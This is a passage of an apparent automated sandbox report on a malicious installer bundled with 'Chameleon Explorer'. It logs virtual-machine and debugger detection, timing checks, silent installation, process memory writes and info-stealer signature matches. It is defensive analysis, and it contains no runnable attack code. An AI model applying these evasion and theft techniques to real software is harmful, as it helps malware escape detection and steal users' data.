                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Users\user\AppData\Roaming\update.exe RDTSC instruction interceptor: First address: 000000000046C47A second address: 000000000046C47A instructions: 0x00000000 rdtsc 0x00000002 test cl, FFFFFFFFh 0x00000005 cmp bh, ch 0x00000007 cmp al, 45h 0x00000009 cmp ecx, 00FFFFFFh 0x0000000f jne 00007FD174E1E800h 0x00000011 test dx, dx 0x00000014 cmp eax, eax 0x00000016 cmp si, D590h 0x0000001b inc ecx 0x0000001c test dh, ch 0x0000001e cmp ecx, eax 0x00000020 test ah, bh 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe TID: 6132 Thread sleep count: 1455 > 30
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe TID: 6132 Thread sleep count: 320 > 30
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe TID: 6132 Thread sleep count: 100 > 30
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe TID: 6132 Thread sleep count: 623 > 30
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe TID: 5224 Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe TID: 5208 Thread sleep time: -30000s >= -30000s
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe TID: 1916 Thread sleep time: -45700s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\update.exe TID: 5040 Thread sleep count: 74 > 30
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-614
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe Window / User API: threadDelayed 1455
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe Window / User API: threadDelayed 623
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Window / User API: threadDelayed 457
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04090409
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe API coverage: 7.0 %
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-HQP5N.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V4HOF.tmp\_isetup\_setup64.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-5C20L.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-FAU52.tmp
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy)
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-4Q1I9.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy)
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backup
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe File opened: C:\Users\user
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe File opened: C:\Users\user\AppData
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
#11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM slot #13...(!.....................................RAM slot #14.RAM slot #14...(".....................................RAM slot #15.RAM slot #15...(#.....................................RAM slot #16.RAM slot #16...($.................2
                      Source: ChameleonExplorer.exe, 00000012.00000003.502091244.0000000004D1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, I
                      Source: ChameleonExplorer.exe, 00000012.00000003.476937486.0000000004CBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37
                      Source: ChameleonExplorer.exe, 00000012.00000003.445981366.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 2~
                      Source: ChameleonExplorer.exe, 00000011.00000003.344998251.000000000153C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000003.437311211.0000000004C44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000003.405435943.0000000003C99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware,
                      Source: ChameleonExplorer.exe, 00000012.00000003.426018492.0000000004C36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/
                      Source: ChameleonExplorer.exe, 00000011.00000003.351127386.000000000150C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                      Source: ChameleonExplorer.exe, 00000012.00000002.527446383.0000000006970000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5
                      Source: ChameleonExplorer.exe, 00000012.00000003.451085859.0000000004C6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.None
                      Source: ChameleonExplorer.exe, 00000012.00000003.445981366.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 2~
                      Source: ChameleonExplorer.exe, 00000012.00000003.438139988.0000000004C3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVM
                      Source: ChameleonExplorer.exe, 00000006.00000003.308958993.0000000001559000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000003.493859749.0000000004D11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: re-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000003.420530800.0000000004C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA
                      Source: ChameleonExplorer.exe, 00000012.00000003.464562073.0000000004C86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 2i!
                      Source: ChameleonExplorer.exe, 00000012.00000003.441671519.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                      Source: ChameleonExplorer.exe, 00000012.00000003.485916045.0000000004CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0
                      Source: ChameleonExplorer.exe, 00000012.00000003.438778546.0000000004C2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                      Source: ChameleonExplorer.exe, 00000012.00000003.478277475.0000000004CB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGAs
                      Source: ChameleonExplorer.exe, 00000012.00000003.505350634.0000000004D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.1
                      Source: ChameleonExplorer.exe, 00000012.00000003.482178257.0000000004CC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.1ds
                      Source: ChameleonExplorer.exe, 00000011.00000003.348005571.000000000150C000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000003.346864700.000000000150C000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000003.352722769.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000003.391515521.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000003.391203097.0000000003C35000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000002.525657397.0000000004BA0000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000003.351553891.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000003.363699633.00000000014EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: ChameleonExplorer.exe, 00000006.00000003.324097015.000000000317C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 7VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021tform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM slot #13...(!.....................................RAM slot #14.RAM slot 
#14...(".....................................RAM slot #15.RAM slot #15...(#.....................................RAM slot #16.RAM slot #16...($.................
                      Source: ChameleonExplorer.exe, 00000012.00000003.464562073.0000000004C86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 2i!
                      Source: ChameleonExplorer.exe, 00000012.00000002.517693583.00000000031BF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW71.00V.18227214.B64.2106252220.06/25/2021..........B5. H....^.7.IS....VMware, Inc..None.VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7.VMware7,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W.........
                      Source: ChameleonExplorer.exe, 00000012.00000003.405435943.0000000003C99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM sl
                      Source: ChameleonExplorer.exe, 00000012.00000003.441671519.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                      Source: ChameleonExplorer.exe, 00000006.00000003.323117226.0000000003BD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20
                      Source: ChameleonExplorer.exe, 00000012.00000003.445908659.0000000003CB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.1b
                      Source: ChameleonExplorer.exe, 00000012.00000003.505729138.0000000004D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 2
                      Source: ChameleonExplorer.exe, 00000012.00000003.390284345.0000000003C36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWK
                      Source: ChameleonExplorer.exe, 00000012.00000003.398223420.0000000003C3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8
                      Source: ChameleonExplorer.exe, 00000012.00000003.441671519.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0560AFF0 GetSystemInfo,2_2_0560AFF0
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0560A504 FindFirstFileW,2_2_0560A504
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 16_2_0340A504 FindFirstFileW,16_2_0340A504
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007B106A mov eax, dword ptr fs:[00000030h]3_2_007B106A
                      Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007B2453 mov eax, dword ptr fs:[00000030h]3_2_007B2453
                      Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007B1233 mov eax, dword ptr fs:[00000030h]3_2_007B1233
                      Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007B12AF mov eax, dword ptr fs:[00000030h]3_2_007B12AF
                      Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007B12A2 mov eax, dword ptr fs:[00000030h]3_2_007B12A2
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeCode function: 0_2_00E25B09 IsDebuggerPresent,0_2_00E25B09
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeCode function: 0_2_00E25CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00E25CCC
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeCode function: 0_2_00E1A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E1A395

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeMemory written: PID: 1952 base: 1C0000 value: B8
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeMemory written: PID: 1952 base: 2512D8 value: 00
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeMemory written: PID: 1952 base: 2521E8 value: 00
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe"
                      Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Users\user\AppData\Roaming\update.exe C:\Users\user\AppData\Roaming\update.exe"
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 66670
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                      Source: ChameleonFolder.exe, ChameleonFolder.exe, 00000010.00000002.518805679.0000000003411000.00000020.00000001.01000000.00000010.sdmp, ChameleonExplorer.exe, 00000011.00000002.367005994.0000000003A41000.00000020.00000001.01000000.00000012.sdmp, ChameleonFolder.exe, 00000015.00000002.375388997.0000000002941000.00000020.00000001.01000000.00000010.sdmpBinary or memory string: Shell_TrayWnd
                      Source: ChameleonFolder.exe, ChameleonExplorer.exe, 00000011.00000002.367005994.0000000003A41000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Progman
                      Source: ChameleonFolder.exe, 0000000F.00000000.332118308.0000000000418000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: GetTaskbarPositionShell_TrayWnd
                      Source: ChameleonFolder.exe, 0000000F.00000000.332118308.0000000000418000.00000020.00000001.01000000.0000000F.sdmp, ChameleonFolder.exe, 00000010.00000002.518805679.0000000003411000.00000020.00000001.01000000.00000010.sdmp, ChameleonFolder.exe, 00000015.00000002.375388997.0000000002941000.00000020.00000001.01000000.00000010.sdmpBinary or memory string: ProgmanU
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05605618 cpuid 2_2_05605618
                      Source: C:\Users\user\AppData\Roaming\update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeCode function: 0_2_00E250D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00E250D7
                      Source: ChameleonExplorer.exe, 00000012.00000002.517530038.0000000003115000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000002.522386790.0000000003BC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\192.168.2.1\all\procexp.exe
                      Source: ChameleonExplorer.exe, 00000012.00000002.522386790.0000000003BC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "c:\users\user\desktop\procexp.exe

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: 20.2.update.exe.29b6000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.update.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.update.exe.29b6000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
